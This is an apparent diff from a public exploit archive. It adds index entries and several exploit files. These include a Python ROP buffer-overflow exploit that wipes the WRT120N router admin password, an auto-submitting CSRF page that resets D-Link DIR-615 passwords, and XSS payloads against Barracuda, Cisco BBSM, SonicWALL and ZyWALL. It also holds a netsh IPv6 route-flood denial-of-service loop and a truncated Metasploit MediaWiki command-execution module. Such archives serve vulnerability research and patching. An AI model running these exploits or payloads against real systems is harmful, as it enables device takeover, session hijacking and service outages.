Updated 02_21_2014

files.csv

@@ -28527,6 +28527,7 @@ id,file,description,date,author,platform,type,port
 31732,platforms/php/webapps/31732.txt,"GEDCOM_TO_MYSQL php/info.php Multiple Parameter XSS",2008-05-05,ZoRLu,php,webapps,0
 31733,platforms/hardware/webapps/31733.txt,"My PDF Creator & DE DM 1.4 iOS - Multiple Vulnerabilities",2014-02-18,Vulnerability-Lab,hardware,webapps,50496
 31735,platforms/php/webapps/31735.txt,"Concrete5 5.6.2.1 (index.php, cID param) - SQL Injection",2014-02-18,killall-9,php,webapps,80
+31736,platforms/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - POST Request Stack Buffer Overflow",2014-02-18,Sumit,windows,remote,80
 31737,platforms/windows/remote/31737.rb,"Oracle Forms and Reports Remote Code Execution",2014-02-18,metasploit,windows,remote,0
 31738,platforms/php/webapps/31738.txt,"Open Web Analytics 1.5.4 (owa_email_address param) - SQL Injection Vulnerability",2014-02-18,"Dana James Traversie",php,webapps,0
 31739,platforms/php/webapps/31739.txt,"TLM CMS 1.1 'index.php' Multiple SQL Injection Vulnerabilities",2008-05-05,ZoRLu,php,webapps,0
@@ -28545,3 +28546,33 @@ id,file,description,date,author,platform,type,port
 31753,platforms/php/webapps/31753.txt,"Tux CMS 0.1 Multiple Cross-Site Scripting Vulnerabilities",2008-05-07,"Hadi Kiamarsi",php,webapps,0
 31754,platforms/cgi/webapps/31754.txt,"SAP Internet Transaction Server 6200.1017.50954.0 Bu WGate wgate.dll ~service Parameter XSS",2008-05-08,Portcullis,cgi,webapps,0
 31755,platforms/cgi/webapps/31755.txt,"SAP Internet Transaction Server 6200.1017.50954.0 Bu query String Javascript Splicing XSS",2008-05-08,Portcullis,cgi,webapps,0
+31756,platforms/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 Error Page Cross-Site Scripting Vulnerability",2008-05-08,"Deniz Cevik",multiple,remote,0
+31757,platforms/multiple/remote/31757.txt,"ZyWALL 100 HTTP Referer Header Cross Site Scripting Vulnerability",2008-05-08,"Deniz Cevik",multiple,remote,0
+31758,platforms/hardware/remote/31758.py,"WRT120N 1.0.0.7 Stack Overflow",2014-02-19,"Craig Heffner",hardware,remote,80
+31759,platforms/windows/remote/31759.txt,"Microsoft Internet Explorer 2.0 UTF-7 HTTP Response Handling Weakness",2008-05-08,"Yaniv Miron",windows,remote,0
+31762,platforms/windows/dos/31762.py,"Catia V5-6R2013 ""CATV5_AllApplications"" - Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",windows,dos,55555
+31763,platforms/windows/dos/31763.py,"SolidWorks Workgroup PDM 2014 SP2 Opcode 2001 - Denial of Service",2014-02-19,"Mohamed Shetta",windows,dos,30000
+31764,platforms/hardware/webapps/31764.txt,"Dlink DIR-615 Hardware vE4 Firmware v5.10 - CSRF Vulnerability",2014-02-19,"Dhruv Shah",hardware,webapps,80
+31765,platforms/hardware/webapps/31765.txt,"Barracuda Message Archiver 650 - Persistent XSS Vulnerability",2014-02-19,Vulnerability-Lab,hardware,webapps,3378
+31766,platforms/windows/local/31766.rb,"Audiotran PLS File Stack Buffer Overflow",2014-02-19,metasploit,windows,local,0
+31767,platforms/multiple/remote/31767.rb,"MediaWiki Thumb.php Remote Command Execution",2014-02-19,metasploit,multiple,remote,80
+31768,platforms/php/webapps/31768.txt,"Wordpress BP Group Documents Plugin 1.2.1 - Multiple Vulnerabilities",2014-02-19,"Tom Adams",php,webapps,80
+31769,platforms/windows/remote/31769.html,"Ourgame 'GLIEDown2.dll' ActiveX Control Remote Code Execution Vulnerability",2008-05-08,anonymous,windows,remote,0
+31770,platforms/multiple/remote/31770.txt,"Oracle Application Server Portal 10g Authentication Bypass Vulnerability",2008-05-09,"Deniz Cevik",multiple,remote,0
+31771,platforms/php/webapps/31771.txt,"cPanel 11.x scripts2/knowlegebase issue Parameter XSS",2008-05-09,"Matteo Carli",php,webapps,0
+31772,platforms/php/webapps/31772.txt,"cPanel 11.x scripts2/changeip user Parameter XSS",2008-05-09,"Matteo Carli",php,webapps,0
+31773,platforms/php/webapps/31773.txt,"cPanel 11.x scripts2/listaccts search Parameter XSS",2008-05-09,"Matteo Carli",php,webapps,0
+31774,platforms/php/webapps/31774.txt,"BlogPHP 2.0 index.php Multiple Parameter XSS",2008-05-10,"David Sopas Ferreira",php,webapps,0
+31775,platforms/php/webapps/31775.txt,"OtherLogic 'vocourse.php' SQL Injection Vulnerability",2008-05-10,Breeeeh,php,webapps,0
+31776,platforms/php/webapps/31776.txt,"WordPress WP Photo Album Plugin 'photo' Parameter SQL Injection Vulnerability",2008-05-09,THE_MILLER,php,webapps,0
+31777,platforms/php/webapps/31777.txt,"AJ Classifieds 'index.php' SQL Injection Vulnerability",2008-05-12,t0pP8uZz,php,webapps,0
+31778,platforms/php/webapps/31778.txt,"phpInstantGallery 2.0 index.php gallery Parameter XSS",2008-05-12,ZoRLu,php,webapps,0
+31779,platforms/php/webapps/31779.txt,"phpInstantGallery 2.0 image.php Multiple Parameter XSS",2008-05-12,ZoRLu,php,webapps,0
+31780,platforms/php/webapps/31780.txt,"CyrixMED 1.4 'index.php' Cross Site Scripting Vulnerability",2008-05-12,ZoRLu,php,webapps,0
+31781,platforms/php/webapps/31781.txt,"IBD Micro CMS 3.5 'microcms-admin-login.php' Multiple SQL Injection Vulnerabilities",2008-05-12,SkyOut,php,webapps,0
+31782,platforms/php/webapps/31782.txt,"Claroline <= 1.7.5 Multiple Remote File Include Vulnerabilities",2008-05-12,MajnOoNxHaCkEr,php,webapps,0
+31783,platforms/php/webapps/31783.txt,"Fusebox 5.5.1 'fusebox5.php' Remote File Include Vulnerability",2008-05-12,MajnOoNxHaCkEr,php,webapps,0
+31784,platforms/php/webapps/31784.txt,"PhpMyAgenda 2.1 'infoevent.php3' Remote File Include Vulnerability",2008-05-12,MajnOoNxHaCkEr,php,webapps,0
+31785,platforms/multiple/dos/31785.txt,"Multiple Platform IPv6 Address Publication Denial of Service Vulnerabilities",2008-05-13,"Tyler Reguly",multiple,dos,0
+31786,platforms/asp/webapps/31786.txt,"Cisco BBSM Captive Portal 5.3 'AccesCodeStart.asp' Cross-Site Scripting Vulnerability",2008-05-13,"Brad Antoniewicz",asp,webapps,0
+31787,platforms/php/webapps/31787.txt,"Kalptaru Infotech Automated Link Exchange Portal 'linking.page.php' SQL Injection Vulnerability",2008-05-13,HaCkeR_EgY,php,webapps,0

platforms/asp/webapps/31786.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29191/info
+
+Cisco BBSM (Building Broadband Service Manager) is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Cisco BBSM 5.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/ekgnkm/AccessCodeStart.asp?msg=%3Cscript%3Ealert(%22XSS%22);%3C/script%3E 

platforms/hardware/remote/31758.py

@@ -0,0 +1,49 @@
+#!/usr/bin/env python
+#
+# WRT120N v1.0.0.7 stack overflow, ROP to 4-byte overwrite which clears the admin password.
+#
+# Craig Heffner
+# http://www.devttys0.com
+# 2014-02-14
+
+import sys
+import urllib2
+
+try:
+    target = sys.argv[1]
+except IndexError:
+    print "Usage: %s <target ip>" % sys.argv[0]
+    sys.exit(1)
+
+url = target + '/cgi-bin/tmUnblock.cgi'
+if '://' not in url:
+    url = 'http://' + url
+
+post_data = "period=0&TM_Block_MAC=00:01:02:03:04:05&TM_Block_URL="
+post_data += "B" * 246                  # Filler
+post_data += "\x81\x54\x4A\xF0"         # $s0, address of admin password in memory
+post_data += "\x80\x31\xF6\x34"         # $ra
+post_data += "C" * 0x28                 # Stack filler
+post_data += "D" * 4                    # ROP 1 $s0, don't care
+post_data += "\x80\x34\x71\xB8"         # ROP 1 $ra (address of ROP 2)
+post_data += "E" * 8                    # Stack filler
+
+for i in range(0, 4):
+    post_data += "F" * 4                # ROP 2 $s0, don't care
+    post_data += "G" * 4                # ROP 2 $s1, don't care
+    post_data += "\x80\x34\x71\xB8"     # ROP 2 $ra (address of itself)
+    post_data += "H" * (4-(3*(i/3)))    # Stack filler; needs to be 4 bytes except for the
+                                        # last stack frame where it needs to be 1 byte (to
+                                        # account for the trailing "\n\n" and terminating
+                                        # NULL byte)
+
+try:
+    req = urllib2.Request(url, post_data)
+    res = urllib2.urlopen(req)
+except urllib2.HTTPError as e:
+    if e.code == 500:
+        print "OK"
+    else:
+        print "Received unexpected server response:", str(e)
+except KeyboardInterrupt:
+    pass

platforms/hardware/webapps/31764.txt

@@ -0,0 +1,100 @@
+####################################################################################
+
+# Exploit Title: Dlink DIR-615 Hardware Version E4 Firmware Verion 5.10
+CSRF Vulnerability
+# Google Dork: N/A
+# Date: 19/02/2014
+# Exploit Author: Dhruv Shah
+# Vendor Homepage:
+http://www.dlink.com/us/en/home-solutions/connect/routers/dir-615-wireless-n-300-router
+# Software Link: N/A
+# Hardware Version:E4
+
+# Firmware Version:5.10
+# Tested on: Router Web Server
+# CVE : N/A
+
+###################################################################################
+
+Cross Site Request Forgery
+
+This Modem's Web Application , suffers from Cross-site request forgery
+
+through which attacker can manipulate user data via sending him malicious
+
+craft url.
+
+The Modems's Application  not using any security token to prevent it
+
+against CSRF. You can manipulate any userdata. PoC and Exploit to change
+
+user password:
+
+ In the POC the IP address in the POST is the modems IP address.
+
+
+
+<html>
+
+  <body>
+
+                <form id ="poc"action="http://192.168.0.1/apply.cgi"
+method="POST">
+
+      <input type="hidden" name="html_response_page"
+value="back.asp" />
+
+      <input type="hidden" name="html_response_message"
+value="The setting is saved." />
+
+      <input type="hidden" name="html_response_return_page"
+value="login.asp" />
+
+      <input type="hidden" name="reboot_type" value="none" />
+
+      <input type="hidden" name="button1" value="Save Settings" />
+
+      <input type="hidden" name="admin_password" value="test" />
+
+      <input type="hidden" name="admin_password1" value="test" />
+
+      <input type="hidden" name="admPass2" value="test" />
+
+      <input type="hidden" name="user_password" value="test" />
+
+      <input type="hidden" name="user_password1" value="test" />
+
+      <input type="hidden" name="usrPass2" value="test" />
+
+      <input type="hidden" name="hostname" value="DIR-615" />
+
+      <input type="hidden" name="graphical_enable" value="1" />
+
+      <input type="hidden" name="graph_auth_enable" value="1" />
+
+      <input type="hidden" name="remote_http_management_enable"
+value="0" />
+
+      <input type="hidden"
+name="remote_http_management_inbound_filter"
+value="Allow_All" />
+
+    </form>
+
+  </body>
+
+  <script
+type="text/javascript">document.getElementById("poc").submit();</script>
+
+</html>
+
+______________________
+
+*Dhruv Shah* *aka Snypter*
+
+Blogger | Researcher | Consultant | Writer
+Youtube <http://www.youtube.com/snypter> |
+Facebook<http://www.facebook.com/dhruvshahs>|
+Linkedin <http://in.linkedin.com/pub/dhruv-shah/26/4a6/aa0> |
+Twitter<https://twitter.com/Snypter>|
+Blog <http://security-geek.in/blog/>

platforms/hardware/webapps/31765.txt

@@ -0,0 +1,202 @@
+Document Title:
+===============
+Barracuda Message Archiver 650 - Persistent Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=751
+
+Barracuda Networks Security ID (BNSEC): 703
+
+
+Release Date:
+=============
+2014-02-18
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+751
+
+
+Common Vulnerability Scoring System:
+====================================
+3.5
+
+
+Product & Service Introduction:
+===============================
+The Barracuda Message Archiver is a complete and affordable email archiving solution, enabling you to effectively 
+index and preserve all emails, enhance operational efficiencies and enforce policies for regulatory compliance. By 
+leveraging standard policies and seamless access to messages, email content is fully indexed and backed up to enable 
+administrators, auditors and end users quick retrieval of any email message stored in an organization’s email archive.
+
+    * Comprehensive archiving
+    * Exchange stubbing
+    * Search and retrieval
+    * Policy management
+    * Intelligent Storage Manager
+    * Roles-based interface
+    * Reporting and statistics
+
+The Barracuda Message Archiver provides everything an organization needs to comply with government regulations in an 
+easy to install and administer plug-and-play hardware solution. The Barracuda Message Archiver stores and indexes all 
+email for easy search and retrieval by both regular users and third-party auditors. Backed by Energize Updates, delivered 
+by Barracuda Central, the Barracuda Message Archiver receives automatic updates to its extensive library of virus, policy 
+definitions to enable enhanced monitoring of compliance and corporate guidelines, document file format updates needed to 
+decode content within email attachments, as well as security updates for the underlying Barracuda Message Archiver platform 
+to protect against any potential security vulnerabilities.
+
+(Copy of the Vendor Homepage: http://www.barracudanetworks.com )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered a persistent web vulnerability in Barracudas Messsage Archiver 3.1.0.914 Appliance Application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2013-11-08:	Researcher Notification & Coordination (Benjamin Kunz Mejri)
+2013-11-10:	Vendor Notification (Barracuda Networks - Bug Bounty Program)
+2013-11-13:	Vendor Response/Feedback (Barracuda Networks - Bug Bounty Program)
+2013-02-17:	Vendor Fix/Patch (Barracuda Networks Developer Team)
+2014-02-18:	Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Barracuda Networks
+Product: Message Archiver 650 - Appliance Application 3.1.0.914
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+A persistent input validation vulnerability has been discovered in the official Barracuda Networks Message Archiver 650 v3.1.0.914 appliance web-application.
+The remote vulnerability allows remote attackers to inject own malicious script codes on the application-side of the vulnerable message archiver module.
+
+The vulnerability is located in the `Benutzer > Neu Anlegen > Rolle: Auditor > Domänen` module. Remote attackers are able to inject own malicious script 
+codes with persistent attack vector in the vulnerable domain_list_table-r0 parameter. The execution of the script code occurs in the domain_list_table-r0 
+and user_domain_admin:1 appliance application response context. The request method is POST and the attack vector is persistent on the application-side of 
+the barracuda networks message archiver appliance. The security risk of the input validation web vulnerability is 
+estimated as medium with a cvss (common vulnerability scoring system) count of 3.5(+)|(-)3.6.
+
+Exploitation of the vulnerability requires a low privileged or restricted application user account with low or medium user interaction. Successful exploitation 
+of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation of module context.
+
+Request Method(s):
+				[+] POST
+
+Vulnerable Module(s):
+				[+] Benutzer > Neu Anlegen > Rolle: Auditor > Domänen
+
+Vulnerable Parameter(s):
+				[+] domain_list_table-r0
+
+
+
+Proof of Concept (PoC):
+=======================
+The persistent web vulnerability can be exploited by remote attacker with low privileged application user account and low required user inter action. 
+For security demonstration or to reproduce the remote vulnerability follow the provided information and steps below.
+
+Benutzer > Neu Anlegen > Rolle: Auditor > Domänen > (domain_list_table-r0)
+
+POST REQUEST:
+ajax_bc_sub=addDomain
+domain=%22%3E%3Ciframe%20src%3Dhttp%3A%2F%2Fvuln-lab.com%20onload%3Dalert(document.cookie)%20%3C%20%20%22%3E%3Ciframe%20src
+%3Dhttp%3A%2F%2Fvuln-lab.com%20onload%3Dalert(document.cookie)%20%3C
+user=guest
+password=75361da9533223d9685576d10bd6aa02
+et=
+1352520628
+locale=de_DE
+realm=
+auth_type=Local
+primary_tab=USERS
+secondary_tab=per_user_add_update
+
+
+URL: http://archiver.ptest.localhost:3378/cgi-mod/index.cgi?auth_type=Local&et=1352520461&locale=de_DE&password=4b0a7f3a136e60c7cf73ec1b30ec6a23&
+primary_tab=USERS&realm=&secondary_tab=per_user_add_update&user=benjaminKM
+
+PoC: Benutzer > Neu Anlegen > Rolle: Auditor > Domänen > (domain_list_table-r0)
+
+<td style="vertical-align:middle;text-align:left;white-space:nowrap">
+ %20?????">?????<iframe src="http://vuln-lab.com" onload="alert(document.cookie)" <="" 
+"="[PERSISTENT INJECTED SCRIPT CODE!]< </iframe><input name="user_domain_admin:1" 
+id="user_domain_admin:1" value=""[PERSISTENT INJECTED SCRIPT CODE!]" type="hidden"></td>
+
+
+Reference(s):
+http://archiver.ptest.localhost:3378/cgi-mod/index.cgi
+
+http://archiver.ptest.localhost:3378/cgi-mod/index.cgi?auth_type=Local&et=1352520461&locale=de_DE&password=4b0a7f3a136e60c7cf73ec1b30ec6a23&
+primary_tab=USERS&realm=&secondary_tab=per_user_add_update&user=benjaminKM
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure parse of the vulnerable affected listing in the domain_list_table-r0 parameter.
+
+Barracuda Networks Appliance: Advanced->Firmware Updates page
+
+
+Security Risk:
+==============
+The security risk of the persistent input validation web vulnerability is estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team]  - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
+Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
+profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
+states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
+may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
+or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
+Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
+Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
+other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
+modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
+
+    				   	Copyright © 2013 | Vulnerability Laboratory
+
+
+
+-- 
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+

platforms/multiple/dos/31785.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29190/info
+
+Multiple operating systems are prone to remote denial-of-service vulnerabilities that occur when affected operating systems are acting as IPv6 routers.
+
+Successful exploits allow remote attackers to cause computers to consume excessive CPU resources or to stop responding to advertised routes in a network. This will potentially deny further network services to legitimate users.
+
+Microsoft Windows XP, Microsoft Windows Server 2003, and Linux are prone to these issues. Other operating systems may also be affected.
+
+for /L %k in (0, 1, 9999) DO for /L %i in (0, 1, 9999) DO netsh interface ipv6 add route 2001:db8:%k:%i::/64 "Local Area Connection" publish=yes 

platforms/multiple/remote/31756.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29107/info
+
+SonicWALL Email Security is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input when displaying URI address data in an error page.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+SonicWALL Email Security 6.1.1 is vulnerable; other versions may also be affected. 
+
+GET /blah.htm HTTP/1.1 Host: "><script>alert('XSS');</script> 

platforms/multiple/remote/31757.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29110/info
+
+ZyWALL 100 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+GET /blah.htm HTTP/1.1
+Host: www.site.com
+Referer: blaaaa"><script>alert(12345)</script>aaaah.htm

platforms/multiple/remote/31767.rb

@@ -0,0 +1,367 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'MediaWiki Thumb.php Remote Command Execution',
+      'Description' => %q{
+        MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11,
+      when DjVu  or PDF file upload support is enabled, allows remote unauthenticated
+      users to execute arbitrary commands via shell metacharacters. If no target file
+      is specified this module will attempt to log in with the provided credentials to
+      upload a file (.DjVu) to use for exploitation.
+      },
+      'Author' =>
+        [
+          'Netanel Rubin', # from Check Point - Discovery
+          'Brandon Perry', # Metasploit Module
+          'Ben Harris', # Metasploit Module
+          'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          [ 'CVE', '2014-1610' ],
+          [ 'OSVDB', '102630'],
+          [ 'URL', 'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ],
+          [ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ]
+        ],
+      'Privileged' => false,
+      'Targets' =>
+        [
+          [ 'Automatic PHP-CLI',
+            {
+              'Payload' =>
+                {
+                  'BadChars' => "\r\n",
+                  'PrependEncoder' => "php -r \"",
+                  'AppendEncoder' => "\""
+                },
+              'Platform' => ['php'],
+              'Arch' => ARCH_PHP
+            }
+          ],
+          [ 'Linux CMD',
+            {
+              'Payload'        =>
+                {
+                  'BadChars' => "",
+                  'Compat'      =>
+                    {
+                      'PayloadType' => 'cmd',
+                      'RequiredCmd' => 'generic perl python php',
+                    }
+                },
+              'Platform' => ['unix'],
+              'Arch' => ARCH_CMD
+            }
+          ],
+          [ 'Windows CMD',
+            {
+              'Payload'        =>
+                {
+                  'BadChars' => "",
+                  'Compat'      =>
+                    {
+                      'PayloadType' => 'cmd',
+                      'RequiredCmd' => 'generic perl',
+                    }
+                },
+              'Platform' => ['win'],
+              'Arch' => ARCH_CMD
+            }
+          ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jan 28 2014'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "Base MediaWiki path", '/mediawiki' ]),
+        OptString.new('FILENAME', [ false, "Target DjVu/PDF file (e.g target.djvu target.pdf)", nil ]),
+        OptString.new('USERNAME', [ false, "Username to authenticate with", '' ]),
+        OptString.new('PASSWORD', [ false, "Password to authenticate with", '' ])
+      ], self.class)
+  end
+
+  def get_version(body)
+    meta_generator = get_html_value(body, 'meta', 'generator', 'content')
+
+    unless meta_generator
+      vprint_status("No META Generator tag on #{full_uri}.")
+      return nil, nil, nil
+    end
+
+    if meta_generator && meta_generator =~ /mediawiki/i
+      vprint_status("#{meta_generator} detected.")
+      meta_generator =~ /(\d)\.(\d+)[\.A-z]+(\d+)/
+      major = $1.to_i
+      minor = $2.to_i
+      patch = $3.to_i
+      vprint_status("Major:#{major} Minor:#{minor} Patch:#{patch}")
+
+      return major, minor, patch
+    end
+
+    return nil, nil, nil
+  end
+
+  def check
+    uri = target_uri.path
+
+    opts = { 'uri' => normalize_uri(uri, 'index.php') }
+
+    response = send_request_cgi!(opts)
+
+    if opts['redirect_uri']
+      vprint_status("Redirected to #{opts['redirect_uri']}.")
+    end
+
+    unless response
+      vprint_status("No response from #{full_uri}.")
+      return CheckCode::Unknown
+    end
+
+    # Mediawiki will give a 404 for unknown pages but still have a body
+    if response.code == 200 || response.code == 404
+      vprint_status("#{response.code} response received...")
+
+      major, minor, patch = get_version(response.body)
+
+      unless major
+        return CheckCode::Unknown
+      end
+
+      if major == 1 && (minor < 8 || minor > 22)
+        return CheckCode::Safe
+      elsif major == 1 && (minor == 22 && patch > 1)
+        return CheckCode::Safe
+      elsif major == 1 && (minor == 21 && patch > 4)
+        return CheckCode::Safe
+      elsif major == 1 && (minor == 19 && patch > 10)
+        return CheckCode::Safe
+      elsif major == 1
+        return CheckCode::Appears
+      else
+        return CheckCode::Safe
+      end
+    end
+
+    vprint_status("Received response code #{response.code} from #{full_uri}")
+    CheckCode::Unknown
+  end
+
+  def exploit
+    uri = target_uri.path
+
+    print_status("Grabbing version and login CSRF token...")
+    response = send_request_cgi({
+      'uri' => normalize_uri(uri, 'index.php'),
+      'vars_get' => { 'title' => 'Special:UserLogin' }
+    })
+
+    unless response
+      fail_with(Failure::NotFound, "Failed to retrieve webpage.")
+    end
+
+    server = response['Server']
+    if server && target.name =~ /automatic/i && server =~ /win32/i
+      vprint_status("Windows platform detected: #{server}.")
+      my_platform = Msf::Module::Platform::Windows
+    elsif server && target.name =~ /automatic/i
+      vprint_status("Nix platform detected: #{server}.")
+      my_platform = Msf::Module::Platform::Unix
+    else
+      my_platform = target.platform.platforms.first
+    end
+
+    # If we have already identified a DjVu/PDF file on the server trigger
+    # the exploit
+    unless datastore['FILENAME'].blank?
+      payload_request(uri, datastore['FILENAME'], my_platform)
+      return
+    end
+
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+
+    major, minor, patch = get_version(response.body)
+
+    # Upload CSRF added in v1.18.2
+    # http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1
+    if ((major == 1) && (minor == 18) && (patch == 0 || patch == 1))
+      upload_csrf = false
+    elsif ((major == 1) && (minor < 18))
+      upload_csrf = false
+    else
+      upload_csrf = true
+    end
+
+    session_cookie = response.get_cookies
+
+    wp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value')
+
+    if wp_login_token.blank?
+      fail_with(Failure::UnexpectedReply, "Couldn't find login token. Is URI set correctly?")
+    else
+      print_good("Retrieved login CSRF token.")
+    end
+
+    print_status("Attempting to login...")
+    login = send_request_cgi({
+      'uri' => normalize_uri(uri, 'index.php'),
+      'method' => 'POST',
+      'vars_get' => {
+        'title' => 'Special:UserLogin',
+        'action' => 'submitlogin',
+        'type' => 'login'
+      },
+      'cookie' => session_cookie,
+      'vars_post' => {
+        'wpName' => username,
+        'wpPassword' => password,
+        'wpLoginAttempt' => 'Log in',
+        'wpLoginToken' => wp_login_token
+      }
+    })
+
+    if login and login.code == 302
+      print_good("Log in successful.")
+    else
+      fail_with(Failure::NoAccess, "Failed to log in.")
+    end
+
+    auth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','')
+
+    # Testing v1.15.1 it looks like it has session fixation
+    # vulnerability so we dont get a new session cookie after
+    # authenticating. Therefore we need to include our old cookie.
+    unless auth_cookie.include? 'session='
+      auth_cookie << session_cookie
+    end
+
+    print_status("Getting upload CSRF token...") if upload_csrf
+    upload_file = send_request_cgi({
+      'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),
+      'cookie' => auth_cookie
+    })
+
+    unless upload_file and upload_file.code == 200
+      fail_with(Failure::NotFound, "Failed to access file upload page.")
+    end
+
+    wp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf
+    wp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value')
+    title = get_html_value(upload_file.body, 'input', 'title', 'value')
+
+    if upload_csrf && wp_edit_token.blank?
+      fail_with(Failure::UnexpectedReply, "Couldn't find upload token. Is URI set correctly?")
+    elsif upload_csrf
+      print_good("Retrieved upload CSRF token.")
+    end
+
+    upload_mime = Rex::MIME::Message.new
+
+    djvu_file = ::File.read(::File.join(Msf::Config.data_directory, "exploits", "cve-2014-1610", "metasploit.djvu"))
+    file_name = "#{rand_text_alpha(4)}.djvu"
+
+    upload_mime.add_part(djvu_file, "application/octet-stream", "binary", "form-data; name=\"wpUploadFile\"; filename=\"#{file_name}\"")
+    upload_mime.add_part("#{file_name}", nil, nil, "form-data; name=\"wpDestFile\"")
+    upload_mime.add_part("#{rand_text_alpha(4)}", nil, nil, "form-data; name=\"wpUploadDescription\"")
+    upload_mime.add_part("", nil, nil, "form-data; name=\"wpLicense\"")
+    upload_mime.add_part("1",nil,nil, "form-data; name=\"wpIgnoreWarning\"")
+    upload_mime.add_part(wp_edit_token, nil, nil, "form-data; name=\"wpEditToken\"") if upload_csrf
+    upload_mime.add_part(title, nil, nil, "form-data; name=\"title\"")
+    upload_mime.add_part("1", nil, nil, "form-data; name=\"wpDestFileWarningAck\"")
+    upload_mime.add_part(wp_upload, nil, nil, "form-data; name=\"wpUpload\"")
+    post_data = upload_mime.to_s
+
+    print_status("Uploading DjVu file #{file_name}...")
+
+    upload = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),
+      'data'   => post_data,
+      'ctype'  => "multipart/form-data; boundary=#{upload_mime.bound}",
+      'cookie' => auth_cookie
+    })
+
+    if upload and upload.code == 302 and upload.headers['Location']
+      location = upload.headers['Location']
+      print_good("File uploaded to #{location}")
+    else
+      if upload.body.include? 'not a permitted file type'
+        fail_with(Failure::NotVulnerable, "Wiki is not configured for target files.")
+      else
+        fail_with(Failure::UnexpectedReply, "Failed to upload file.")
+      end
+    end
+
+    payload_request(uri, file_name, my_platform)
+  end
+
+  def payload_request(uri, file_name, my_platform)
+    if my_platform == Msf::Module::Platform::Windows
+      trigger = "1)&(#{payload.encoded})&"
+    else
+      trigger = "1;#{payload.encoded};"
+    end
+
+    vars_get = { 'f' => file_name }
+    if file_name.include? '.pdf'
+      vars_get['width'] = trigger
+    elsif file_name.include? '.djvu'
+      vars_get['width'] = 1
+      vars_get['p'] = trigger
+    else
